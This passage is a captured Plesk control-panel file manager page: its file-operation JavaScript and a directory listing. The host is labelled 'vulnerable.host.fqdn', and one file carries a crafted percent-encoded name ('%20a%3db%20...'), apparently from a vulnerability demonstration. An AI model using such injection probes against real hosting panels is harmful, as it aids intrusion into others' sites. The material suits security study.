               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
                f.action = "/plesk/client@2/domain@1/hosting/file-manager/";
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
                f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/";
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
                f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/";
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return 
false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table 
width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" 
id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by 
size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 03:11 PM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = 
this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == 
el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == 
el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_img" value="img" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();">img</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=img" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fimg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == 
el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_picture_library" value="picture_library" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();">picture_library</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=picture_library" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fpicture_library" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" 
onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_test" value="test" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();">test</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=test" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ftest" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, 
&quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%200fd28a9909b" value="%20a%3db%200fd28a9909b" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25200fd28a9909b" onClick="return bin();;lon();">%20a%3db%200fd28a9909b</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%200fd28a9909b" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A 
